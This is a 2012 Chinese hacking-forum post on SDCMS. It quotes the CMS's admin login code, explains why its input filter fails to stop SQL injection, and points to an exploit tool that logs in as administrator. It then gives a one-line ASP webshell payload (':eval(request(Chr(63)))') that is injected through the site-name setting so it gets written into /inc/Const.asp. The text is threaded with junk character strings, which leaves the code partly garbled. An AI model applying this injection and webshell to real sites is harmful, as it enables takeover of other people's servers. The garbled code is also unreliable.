作者:T00LS 鬼哥
" [9 E ~3 h4 J1 W' m) `4 P漏洞文件:后台目录/index.asp
4 e! r% A- v& u
R1 `$ v: F- `! ZSub Check+ t) O$ x5 O" a/ X; V' R: f
Dim username,password,code,getcode,Rs
1 ?" B8 N9 T$ s$ d IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
) a& q- ?6 Y- R. `+ ?3 V username=FilterText(Trim(Request.Form("username")),1); c4 F7 r- D! S; T L& B. M
password=FilterText(Trim(Request.Form("password")),1)- C( q9 d$ f4 u
code=Trim(Request.Form("yzm"))* R% _" h6 E [7 o: \- ]
getcode=Session("SDCMSCode")) g) k* s' f/ t. d
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died$ E5 n- B& a; G; Q) k
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied/ q9 J7 R6 _# c3 G) w4 o. {+ Z
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
& W* ]) u0 E- Y; i K IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied% S5 r) z/ f! a
IF username="" or password="" Then
$ G- i5 M+ i% | Echo "用户名或密码不能为空"ied% W; D$ g$ v m, y1 u' n
Else
0 y6 B3 J, ?' \ v# {9 Q9 p4 \ Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")4 w- V3 y- I) a5 k+ q
IF Rs.Eof Then
2 a" T1 l: {# i, b1 u AddLog username,GetIp,"登录失败",1
N3 Q0 m6 I6 u Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
: e* L& C( g+ {$ I Else% G* Y# R9 _/ @; ~
Add_Cookies "sdcms_id",Rs(0)1 p; P9 {1 _+ W+ Y$ o
Add_Cookies "sdcms_name",username
- u, v; r; Z2 j0 W* ?2 H% m Add_Cookies "sdcms_pwd",Rs(2)/ H; @. o& ~8 h- x
Add_Cookies "sdcms_admin",Rs(3)
$ g; D7 n1 O P5 E7 M( U9 x Add_Cookies "sdcms_alllever",Rs(4)0 X1 s) ^+ [- f" d0 M$ P
Add_Cookies "sdcms_infolever",Rs(5)
0 F3 p8 k7 @/ R* q" f; h N* J Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")- G& u( M+ {0 g
AddLog username,GetIp,"登录成功",15 M5 ~) @0 L5 q D# P: {
'自动删除30天前的Log记录
# O8 U* p/ t+ r6 M( C IF Sdcms_DataType Then
) {* n% {7 J" W! y3 O# M0 A+ W Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
" @8 h, i. \ a Else/ W8 X% m% o" h7 P1 f& Q
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")# p( d& `. T$ z- m6 Q9 e
End IF
8 W; z a4 e" A5 J Go("sdcms_index.asp")
1 @- F0 a2 F4 q6 }0 L& ~ End IF3 ]: }6 U7 P" v6 S" z
Rs.Close2 x9 k, c9 t' ~0 |( n1 z
Set Rs=Nothing
4 z6 w; ^* g' }0 |" q5 d6 C End IF
5 S6 e& D5 n& [: V/ w* ?End Sub% A; H4 S5 i$ t% B" ^! w
' D9 z" E! h2 \
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
6 h1 [' W# N& Q5 v2 f( c$ t4 m6 ^8 D6 G
Function FilterText(ByVal t0,ByVal t1) R0 y3 n7 W4 z2 }
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
" ^. H" u2 r8 Q1 _5 @ t0=Trim(t0)
6 S5 g! J* o5 a, l5 e8 V2 ~& @ D Select Case t1! X) F& U. Z# W" E. z Z/ Z- ?
Case "1"' v) q' ^' \. \8 f+ g. D
t0=Replace(t0,Chr(32),"")
8 h8 m0 e8 d) X* u5 _ t0=Replace(t0,Chr(13),"")
# Q0 {( A) O" V$ w7 W3 x O t0=Replace(t0,Chr(10)&Chr(10),"")3 t. c, ^ b8 N9 @5 `
t0=Replace(t0,Chr(10),"") x1 ~) i( ?7 o
Case "2"
& q$ V& M, V0 |/ g( i9 y t0=Replace(t0,Chr(8),"")'回格8 l- b& O; m. E0 T5 T) O
t0=Replace(t0,Chr(9),"")'tab(水平制表符), }! I; F) w9 b
t0=Replace(t0,Chr(10),"")'换行
' q8 X4 \0 G7 V4 C+ O$ i4 T t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
' _, E# F: l+ R4 n t0=Replace(t0,Chr(12),"")'换页
0 E' Y% n6 F8 S! s t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
* Q) s s" W; ? _- _# ?1 i- l t0=Replace(t0,Chr(22),"")/ c9 {/ X: g5 h+ s) h' C/ C6 N
t0=Replace(t0,Chr(32),"")'空格 SPACE
. R& K- ~. s& {* l t0=Replace(t0,Chr(33),"")'!/ g/ \: R5 u. F+ G5 W4 e J
t0=Replace(t0,Chr(34),"")'"
2 n0 x: ~- B, z t0=Replace(t0,Chr(35),"")'#
1 v5 E" ?' k: U1 r1 w- d+ j t0=Replace(t0,Chr(36),"")'$4 ^4 Q) L2 p S6 T
t0=Replace(t0,Chr(37),"")'%
$ G; k. |8 n/ k* O/ D( V t0=Replace(t0,Chr(38),"")'&# Q" X; i) J( C/ e5 ~+ Y
t0=Replace(t0,Chr(39),"")''
" z9 s' m7 h7 v5 D0 U t0=Replace(t0,Chr(40),"")'(
- F6 \& J) ?& w- Y0 d. `- h4 } t0=Replace(t0,Chr(41),"")')
9 \3 h2 A7 h- s* o8 G+ s3 ?) c t0=Replace(t0,Chr(42),"")'*; e) t* p2 A5 l a) F ~
t0=Replace(t0,Chr(43),"")'+
/ ^. T" S- e" C8 r* a2 l( y t0=Replace(t0,Chr(44),"")',
1 U4 i. H/ T: n t0=Replace(t0,Chr(45),"")'-" G) i) N0 c) K
t0=Replace(t0,Chr(46),"")'.! P' C* p7 R' D' j8 ?7 b% \+ u
t0=Replace(t0,Chr(47),"")'/
9 Y+ |' X% t2 A# [7 B6 d5 k t0=Replace(t0,Chr(58),"")':
! O7 b' V& p' x) E9 _ t0=Replace(t0,Chr(59),"")';
1 F1 C; @. e& H. m t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
0 ?+ u* n# d4 D% @; Y6 n6 J* g a& H t0=Replace(t0,Chr(63),"")'?
% k* U( k9 E) w& _0 E# B# H t0=Replace(t0,Chr(64),"")'@; ]2 ~' _* i4 F# p
t0=Replace(t0,Chr(91),"")'\
# m8 Y4 c: W8 s a t0=Replace(t0,Chr(92),"")'\
. ?* P7 h; ~, ? t0=Replace(t0,Chr(93),"")']
# W' E6 Y0 N, ~9 ?. _9 i9 k) H t0=Replace(t0,Chr(94),"")'^- p8 P: q+ b# x1 O6 ~* O! a
t0=Replace(t0,Chr(95),"")'_$ h M! j4 V- Q( E9 ?7 r1 C9 ~" b
t0=Replace(t0,Chr(96),"")'`
' m$ @1 g& l, t8 T& k K t0=Replace(t0,Chr(123),"")'{
9 ? I0 d; l2 G: H) ` t0=Replace(t0,Chr(124),"")'|! L5 J5 y& j' Y# A. Q" z% v4 e
t0=Replace(t0,Chr(125),"")'}
8 `' R5 x6 E- s# D: w9 T7 h t0=Replace(t0,Chr(126),"")'~* U, \# d2 h1 k1 n" M9 z
Case Else8 i; P$ F- @! B3 I4 s1 s* \
t0=Replace(t0, "&", "&")
; J7 [ s0 l& S+ r" s t0=Replace(t0, "'", "'")
( o; W' o' e9 c! \* }" s) Y t0=Replace(t0, """", """)! Q/ h* h* v' J, Q: C0 r
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")$ u8 q; `* _1 p H
End Select
! C- a9 p7 `2 I6 O+ }5 k( J4 V IF Instr(Lcase(t0),"expression")>0 Then
L, W" g) t: S6 f& ?7 } j t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
# \6 D! }2 ~4 z6 _! @. Y1 Q( X End If; n1 q0 l: R! r. U4 g( A
FilterText=t0
`8 Y, b/ G1 ^+ V& P; h4 @( u! pEnd Function
& G* Y$ N3 v8 `2 D9 b
! o6 u% r# ^$ T; ~# |# }# ?1 e3 ?# _看到没。直接参数是1 只过滤
: U9 r% e* c6 M& b0 P t0=Replace(t0,Chr(32)," ")
' s$ h/ k b e: L& \6 ` t0=Replace(t0,Chr(13),"")0 I+ f+ x( d. x
t0=Replace(t0,Chr(10)&Chr(10),"( c& \3 R9 Z8 ~- [
")
8 S& i' j! Z/ f3 V+ M t0=Replace(t0,Chr(10),"
, k8 }2 Y3 w! \7 o# w& ?")
1 i/ m6 C6 k* x8 J漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
! }+ W4 ]0 S" @' \EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP+ }" s J. _- P
; x* _4 {8 f; U/ b* T) f+ u% o测试:
4 U% K! r6 W8 r. }$ C
5 J; L B* L+ X. u _5 I2 E% O& M, Z/ x6 {1 D
现在输入工具上验证码,然后点OK
* Q, R3 M0 F# Z8 h& W" ~* e' o( Z( U# Y3 S
- }2 j. R1 x; T% F/ {看到我们直接进入后台管理界面了,呵呵!
. O0 E1 r+ s4 t$ e7 k ~4 @! F/ j1 V/ u: o
4 o* F5 k+ s* ^2 Y9 \
& A: t& ^- _) z4 k' R! O9 W5 h7 o+ J这样直接进入后台了。。。。
o; Y3 K& f" Q, Z; j! c6 E, r. |# m% o) W! [9 P4 C. j7 I5 u7 c
0 e! P# [; ^, T
8 q/ r% A2 l1 I/ bSDCMS提权: u+ U+ T+ {5 a! i
9 K1 f! U8 z3 `方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?% ^+ I$ }+ K1 b- X, C
4 n" F- [0 p8 O5 U- X. }4 S6 y
5 b4 m) A2 @/ f, p0 o8 }/ Q) B: P+ }' K2 }' R$ I. ? Q
OK,现在用菜刀连接下!
7 I1 Y7 k* O0 Y0 x; y: h, ?) G. p3 d2 R; t* W) T# q
: z" c- w Y$ H" Y- J6 F8 C0 I8 q. X8 I( o0 b9 ]
# N% n5 M0 g. S6 H4 z0 H! e1 `1 l
0 c0 g1 \* y5 o u5 q |
发表于 2012-11-9 20:57:02
收藏
支持
反对